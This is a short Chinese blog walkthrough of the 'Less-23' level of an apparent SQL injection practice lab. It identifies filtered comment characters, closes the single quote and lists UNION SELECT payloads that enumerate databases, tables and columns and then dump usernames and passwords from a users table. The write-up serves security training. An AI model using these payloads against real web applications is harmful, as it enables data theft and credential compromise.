首页 > 其他 > 详细

Less-23

时间:2020-09-24 10:03:26      阅读:44      评论:0      收藏:0      [点我收藏+]

0x01 判断注入类型

输入‘报错,双引号未报错
技术分享图片

号闭合仍然报错,#、--号被过滤了

技术分享图片
闭合单引号
技术分享图片

0x02 判断数据库名

使用联合查询判断数据库名

?id=-1‘union select 1,(select group_concat(schema_name)from information_schema.schemata),3 and ‘1‘=‘1

技术分享图片

0x03 判断表名

?id=-1‘union select 1,(select group_concat(table_name)from information_schema.tables where table_schema=‘security‘),3 and ‘1‘=‘1

技术分享图片

0x04 判断列名

?id=-1‘union select 1,(select group_concat(column_name)from information_schema.columns where table_schema=‘security‘ and table_name=‘users‘),3 and ‘1‘=‘1

技术分享图片

0x05 得到数据

?id=-1‘union select 1,(select group_concat(username,password)from users),3 and ‘1‘=‘1

技术分享图片

Less-23

原文:https://www.cnblogs.com/observering/p/13722393.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!